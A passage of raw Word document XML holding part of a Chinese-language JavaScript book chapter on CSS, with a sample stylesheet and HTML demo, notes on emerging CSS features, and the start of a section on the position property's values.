      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>举例</w:t>
      </w:r>
      <w:bookmarkEnd w:id="405"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>16-1</w:t>
      </w:r>
      <w:r>
        <w:t>是一个定义和使用了一个样式表的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件，它说明了标签名、类和</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>的选择器，并且还有一个通过</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性定义内联样式的示例。图</w:t>
      </w:r>
      <w:r>
        <w:t>16-1</w:t>
      </w:r>
      <w:r>
        <w:t>显示了它在一个浏览器中是如何渲染的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251691008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4067354" cy="2751826"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="32" name="00032.jpeg" descr="000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00032.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4067354" cy="2751826"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>16-1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　一个应用了</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>16-1</w:t>
      </w:r>
      <w:r>
        <w:t>：定义并使用层叠样式表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>style type="text/css"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t>指定标题文本显示为蓝色、斜体</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>h1,h2{color:blue;font-style:italic}/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>任何</w:t>
      </w:r>
      <w:r>
        <w:t>class="WARNING"</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>元素显示为大号、加黑文本，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>它有很宽的外边距、黄色背景和宽的红色边框</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>.WARNING{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>font-weight:bold;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>font-size:150%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>margin:0 1in 0 1in;/*</w:t>
      </w:r>
      <w:r>
        <w:t>上右下左</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>background-color:yellow;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>border:solid red 8px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>padding:10px;/*4</w:t>
      </w:r>
      <w:r>
        <w:t>条边都是</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>像素</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*class="WARNING"</w:t>
      </w:r>
      <w:r>
        <w:t>的元素里面的</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>h2</w:t>
      </w:r>
      <w:r>
        <w:t>标签内的文本，除了蓝色，还应该居中显示</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">.WARNING </w:t>
      </w:r>
      <w:r>
        <w:t>h1,.WARNING h2{text-align:center}/*id="special"</w:t>
      </w:r>
      <w:r>
        <w:t>的元素大写、居中显示</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#special{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>text-align:center;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>text-transform:uppercase;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</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h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Cascading Style Sheets Demo</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>div class="WARNING"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>h2</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Warning</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/h2</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>This is a warning!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Notice how it grabs </w:t>
      </w:r>
      <w:r>
        <w:t>your attention with its bold text and bright colors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Also notice that the heading is centered and in blue italics.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>p id="special"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>This paragraph is centered</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>and appears in uppercase letters.</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>span style="text-transform:none"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Here we expli</w:t>
      </w:r>
      <w:r>
        <w:t>citly use an inline style to override the uppercase letters.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/span</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/p</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>前沿的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当我在写本章时，</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>正在进行一场变革，现代浏览器厂商正在实现一些强大的新样式属性：</w:t>
      </w:r>
      <w:r>
        <w:t>border-radius</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>text-shadow</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>box-shadow</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>column-count</w:t>
      </w:r>
      <w:r>
        <w:t>。还有一个革命性的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>新特性是</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>字体：利用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>@font-face</w:t>
      </w:r>
      <w:r>
        <w:t>规则可以下载并使用自定义字体。（参见</w:t>
      </w:r>
      <w:r>
        <w:t>http://code.google.com/webf</w:t>
      </w:r>
      <w:r>
        <w:t>onts</w:t>
      </w:r>
      <w:r>
        <w:t>：可以在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>上免费使用所选的字体，并提供了一种从</w:t>
      </w:r>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:t>的服务器下载的方便机制。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>中另外一种革命性的发展是</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>过渡。这是一个规范草案，它能自动将脚本化的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式转换成平滑的动画过渡。（当广泛地</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>实现后，它将大大减少类似在</w:t>
      </w:r>
      <w:r>
        <w:t>16.3.1</w:t>
      </w:r>
      <w:r>
        <w:t>节展现的需要</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>的动画代码。）除了</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>过渡在现代浏览器中都实现了，但它的样式属性仍然需要加厂商前缀。</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>动画的相关建议：将使用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>过渡作为一个定义更加复杂的动画时序的起点。</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>动画当前只有在基于</w:t>
      </w:r>
      <w:r>
        <w:t>Webkit</w:t>
      </w:r>
      <w:r>
        <w:t>的浏览器上实现。过渡和动画在本章中都不会提到，但</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>开发者应该引起注意。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>另外一个</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>草案是</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>变换，</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>开发者也应该引起注</w:t>
      </w:r>
      <w:r>
        <w:t>意。它允许对任何元素应用任意的</w:t>
      </w:r>
      <w:r>
        <w:t>2D</w:t>
      </w:r>
      <w:r>
        <w:t>仿射变换（用一个矩阵表示旋转、缩放、转换或任意组合）。所有的现代浏览器（包括</w:t>
      </w:r>
      <w:r>
        <w:t>IE 9</w:t>
      </w:r>
      <w:r>
        <w:t>及高版本）使用厂商前缀都支持该草案。</w:t>
      </w:r>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>甚至支持一个允许</w:t>
      </w:r>
      <w:r>
        <w:t>3D</w:t>
      </w:r>
      <w:r>
        <w:t>变换的扩展，但是其他厂商是否追随它们的脚步还不得而知。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="406" w:name="16_2_Zhong_Yao_De_CSSShu_Xing_"/>
      <w:r>
        <w:t>16.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　重要的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="406"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对客户端程序员来说，最重要的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>特性是那些指定文档中每个元素的可见性、尺寸和精确定位的属性。其他</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性允许指定堆叠次序、透明度、裁剪区域、外边距、内边距、边框和颜色。为了脚本化</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>，理解这些样式属性的工作原理是非常重要的。表格</w:t>
      </w:r>
      <w:r>
        <w:t>16-1</w:t>
      </w:r>
      <w:r>
        <w:t>做了总结，在本节以下内容中将做详细地阐述。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251692032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4127739" cy="2997679"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="33" name="00033.jpeg" descr="000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00033.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4127739" cy="2997679"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="407" w:name="16_2_1_Yong_CSSDing_Wei_Yuan_Su_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>16.2.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>定位元素</w:t>
      </w:r>
      <w:bookmarkEnd w:id="407"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定了应用到元素上的定位类型，如下是</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个可能出现的属性值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>static</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>默认属性。指定元素按照常规的文档内容流（对多数西方语言而言就是从左往右、从上到下）进行定位。静态定位的元素不能使用</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>和类似其他属性定位。欲对文档元素使用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>定位技术，必先将其</w:t>
      </w:r>
      <w:r>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置为除此之外的其他</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个属性值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>absolute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该值指定元素是相对于它包含的元素进行定位。相对于所有其他的元素，绝</w:t>
      </w:r>
      <w:r>
        <w:t>对定位的元素是独立定位的，它不是静态定位的元素中文档流的一部分。它的定位要么是相对于最近的定位祖先元素，要么是相对于文档本身。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>fixed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该值指定元素是相对于浏览器窗口进行定位的。固定定位的元素总是显示在那里，不会随着文档其他部分而滚动。类似绝对定位</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>的元素，固定定位的元素和所有其他元素是独立的，它不是文档流的一部分。大多数现代浏览器支持固定定位，除了</w:t>
      </w:r>
      <w:r>
        <w:t>IE 6</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>relative</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置为</w:t>
      </w:r>
      <w:r>
        <w:t>relative</w:t>
      </w:r>
      <w:r>
        <w:t>，元素按照常规的文档流进行布局，它的定位相对于它文档流中的位置进行调整。系统保留着元</w:t>
      </w:r>
      <w:r>
        <w:t>素在正常文档流中的空间，不会因为要填充空间而将其各边合拢，也不会将元素从新的位置</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>推开</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一旦设置了元素的</w:t>
      </w:r>
      <w:r>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:t>属性为除了</w:t>
      </w:r>
      <w:r>
        <w:t>static</w:t>
      </w:r>
      <w:r>
